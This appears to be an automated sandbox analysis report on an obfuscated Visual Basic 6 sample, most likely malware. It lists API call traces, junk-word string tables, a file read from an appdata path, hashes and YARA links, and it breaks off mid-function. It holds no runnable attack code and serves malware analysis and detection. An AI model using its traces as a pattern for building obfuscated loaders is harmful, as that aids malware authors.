#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBAA
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBB7
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBBD
#648.MSVBVM60(0000000A), ref: 0041CBE4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041CBF6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC6C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC86
__vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC91
#648.MSVBVM60(0000000A), ref: 0041CCB1
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000704), ref: 0041CD07
__vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000704), ref: 0041CD21
#648.MSVBVM60(0000000A), ref: 0041CD41
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041CD73
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041CD93
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CDC3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CDDD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE10
__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE29
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041CE9A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEA7
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEB7
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEC4
__vbaFpI4.MSVBVM60 ref: 0041CEE2
__vbaStrCopy.MSVBVM60 ref: 0041CEF8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041CF15
__vbaStrMove.MSVBVM60 ref: 0041CF56
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CF72
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CF7F
#574.MSVBVM60(00000003), ref: 0041CFA6
__vbaStrMove.MSVBVM60(00000003), ref: 0041CFB3
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041CFBE
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041CFFB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D038
__vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D052
__vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D05D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D067
__vbaStrCopy.MSVBVM60 ref: 0041D0E6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,0000070C), ref: 0041D144
__vbaFreeStr.MSVBVM60(00000000,00401260,00402344,0000070C), ref: 0041D15E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000710), ref: 0041D1BF
__vbaVarDup.MSVBVM60(00000000,00401260,00402344,00000710), ref: 0041D1F3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D208
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D214
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D221
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D231
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D267
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D2A7
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D2BF
#705.MSVBVM60(00000002,00000000), ref: 0041D2E4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D2F1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D2F7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D332
__vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D34C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D357
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D361
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000718), ref: 0041D3B4
#525.MSVBVM60(00000067), ref: 0041D3D3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D3E0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D3EC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D3F9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D41D
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D440
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D46E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,0000071C), ref: 0041D4AB
__vbaStrMove.MSVBVM60(00000000,00401260,00402344,0000071C), ref: 0041D4DB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D505
#564.MSVBVM60(00000005,?), ref: 0041D53D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041D557
#541.MSVBVM60(?,16:16:16), ref: 0041D577
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041D58A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D590
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D59D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041D5BD
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D609
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D616
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000720), ref: 0041D64C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D682
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041D6A8
#696.MSVBVM60(00402904), ref: 0041D6B5
#696.MSVBVM60(0040294C,00402904), ref: 0041D6C6
__vbaStrCopy.MSVBVM60(0040294C,00402904), ref: 0041D6DD
__vbaFreeStr.MSVBVM60 ref: 0041D723
__vbaVarMove.MSVBVM60 ref: 0041D74A
__vbaVarMove.MSVBVM60 ref: 0041D76C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D780
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D786
__vbaFreeVar.MSVBVM60(0041D878), ref: 0041D820
__vbaFreeStr.MSVBVM60(0041D878), ref: 0041D828
__vbaAryDestruct.MSVBVM60(00000000,?,0041D878), ref: 0041D83F
__vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D847
__vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D84F
__vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D857
__vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D85F
__vbaFreeVar.MSVBVM60(00000000,?,0041D878), ref: 0041D867
__vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D872

Strings

Paucify9, xrefs: 0041CEED
multivalent, xrefs: 0041C37E
STRUTTENDE, xrefs: 0041D3E7
ASCRY, xrefs: 0041D226
SELVFINANSIEREDES, xrefs: 0041D704
7:7:7, xrefs: 0041C2F6
ADMIRINGLY, xrefs: 0041CF7A
Admiraliteternes1, xrefs: 0041C8CE
OFFENTLIGHEDSSFRE, xrefs: 0041C6B4
undrede, xrefs: 0041D10A
Fdres, xrefs: 0041D44C
CANNIBALEAN, xrefs: 0041C374
Odontoma7, xrefs: 0041D10F
Snoreskrternes8, xrefs: 0041CE3B
centralregeringens, xrefs: 0041D0DB
16:16:16, xrefs: 0041D56B
Whiskysourens1, xrefs: 0041CFF6
Bursati, xrefs: 0041C379
Forretningsbrevet5, xrefs: 0041C957
tril, xrefs: 0041CE2F
Vidnefast, xrefs: 0041C98F
Dagvagten, xrefs: 0041C6F8
Skovteknikeren6, xrefs: 0041D6D2
tilskrersaksene, xrefs: 0041C80D
Udstillingslokalet, xrefs: 0041D262
=9, xrefs: 0041D0C9
Kainsmrkernes3, xrefs: 0041D062
Benefact6, xrefs: 0041CF04
replicr, xrefs: 0041C48F
Hjortens, xrefs: 0041C241
blaarv, xrefs: 0041CC30
Generalisations7, xrefs: 0041D35C
SOLITRSKAKKEN, xrefs: 0041D456
RODTEGNENES, xrefs: 0041CEB2
eudaemonistical, xrefs: 0041CEA2
Indvi2, xrefs: 0041D451
DUMBFISH, xrefs: 0041D435
Lersernes, xrefs: 0041CCCB
Utrecht8, xrefs: 0041D18A
Readjust, xrefs: 0041C328

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: d8af4b4ed56b1ce04ec80369087825d785397d132b71784da8bc56000821cb97
Instruction ID: d19f65dcb5dca34613dcd9d285a75da2da83534f200251e5906f204df5f4b324
Opcode Fuzzy Hash: d8af4b4ed56b1ce04ec80369087825d785397d132b71784da8bc56000821cb97
Instruction Fuzzy Hash: 42D2F875940228ABDB21EF61CD85FDDB7B8AF04304F1080EAE509BB2A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAD0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FAEE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FB18
__vbaAryConstruct2.MSVBVM60(?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FB28
#593.MSVBVM60(0000000A), ref: 0041FB46
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041FB51
#537.MSVBVM60(000000D4,0000000A), ref: 0041FB5B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 0041FB65
#648.MSVBVM60(0000000A), ref: 0041FB7C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 0041FBA0
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBB3
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBC0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBD2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBD8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FBF8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FC07
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0041FC2F
__vbaVarDup.MSVBVM60 ref: 0041FC63
#513.MSVBVM60(?,?,000000A2), ref: 0041FC75
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 0041FC96
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FC9C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCA6
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCAE
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCC1
__vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FCDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041FD3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,000000C0), ref: 0041FD9D
__vbaFreeObj.MSVBVM60(00000000,?,004025B0,000000C0), ref: 0041FDBF
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 0041FDDD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FDF0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FDFD
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FE17
#525.MSVBVM60(000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE33
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE3D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE43
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE51
#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE5B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE70
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE7D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE83
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE97
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE9F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FEFA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF04
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF0A
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF1F
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF27
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF7C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFBE
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFD3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420008
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042001D
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420048
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420052
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420058
__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420062
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042006A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420072
__vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200C5
__vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200CD
__vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200D5
__vbaAryDestruct.MSVBVM60(00000000,?,004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200EC
__vbaFreeStr.MSVBVM60(00000000,?,004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200F4

Strings

Jiggerens, xrefs: 0041FBAA
BESMUDSES, xrefs: 0042003F
2:2:2, xrefs: 0041FE67
Suppositoriets, xrefs: 0041FF77
UNINTERMITTEDLY, xrefs: 0041FDD8
:, xrefs: 0041FDC4
MINESTRYGNING, xrefs: 0041FE56
PREHISTORICS, xrefs: 0041FC46
Rappees, xrefs: 0041FBA5

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 740cc0b24e97e91ff2f29ee006d99298746f66b207f1b81d73c25490db96b919
Instruction ID: 0027439f186adb7de10d98962c97fdb4750209cdc544478769bcad2128c15f9d
Opcode Fuzzy Hash: 740cc0b24e97e91ff2f29ee006d99298746f66b207f1b81d73c25490db96b919
Instruction Fuzzy Hash: 1A026E71940218ABDB15EBA0DC96FEDB7B8BF04304F10816FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D89C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041D8B9
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041D8D9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041D8F4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041D903
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D91E
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D928
__vbaNew2.MSVBVM60(004025A0,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041D940
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041D9A2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DA01
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DA23
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DA30
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041DA3A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DA44
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA4F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA66
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA8E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA9B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DABA
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAC0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DACA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAD9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAE1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DAF4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DB04
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DB0B
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DB19
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB22
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB2C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB34
__vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB6A
__vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB72
__vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB7A
__vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB82

Strings

Ambulancesagen2, xrefs: 0041D8DE
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041DAA0
appdata, xrefs: 0041DA7A
CONTINUATOR, xrefs: 0041DA28
Scopiformly9, xrefs: 0041D8CB
baadene, xrefs: 0041D8D0
Jordfstedes4, xrefs: 0041DA4A
Reklamekampagne4, xrefs: 0041D919

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: b3148a8c7af0992b69a4cef94eb25678f357a958fee12bf61983a4a2d946edf0
Instruction ID: 883565fa33546568cfc74b515b4cdddcb2f31a5c13bcaadf21b5faae7a44e9a2
Opcode Fuzzy Hash: b3148a8c7af0992b69a4cef94eb25678f357a958fee12bf61983a4a2d946edf0
Instruction Fuzzy Hash: A571FB71E00218AADB10EBA1CD46FDEB7B8AF05704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420284, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 004202A2
#575.MSVBVM60(?,00000003), ref: 004202F1
#518.MSVBVM60(?,?,?,00000003), ref: 004202FE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420322
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042033C
__vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,00401546), ref: 0042036D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 004203CF
__vbaChkstk.MSVBVM60(00000000,?,00402590,00000014), ref: 00420400
__vbaStrI4.MSVBVM60(005E4C2E), ref: 00420416
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420420
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420461
__vbaFreeStr.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420478
__vbaFreeObj.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420480
#573.MSVBVM60(?,00000002), ref: 004204A2
__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004204C6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204CC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204D6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204DE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004204F1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420513
#564.MSVBVM60(00000004,?), ref: 004205E7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420601
__vbaI4Var.MSVBVM60(?), ref: 00420619
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 0042063A
__vbaOnError.MSVBVM60(000000FF), ref: 004206D0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 004206E1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 004206EB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004206F1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004206FC
__vbaAryDestruct.MSVBVM60(00000000,?,00420748), ref: 0042073A
__vbaFreeStr.MSVBVM60(00000000,?,00420748), ref: 00420742

Strings

FOSTERET, xrefs: 00420303

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: 74585fb6c561aa1d578bae654ca479468f3293eccefd2cf2175f35a5edf0b167
Instruction ID: 175c832a1b51420b5258a5431e878aaed3d7726f1090ab63ff026ef9ecbe60f6
Opcode Fuzzy Hash: 74585fb6c561aa1d578bae654ca479468f3293eccefd2cf2175f35a5edf0b167
Instruction Fuzzy Hash: FED108B5910218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E66D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E688
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041E6A0
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6B0
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6B9
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6C3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6CB
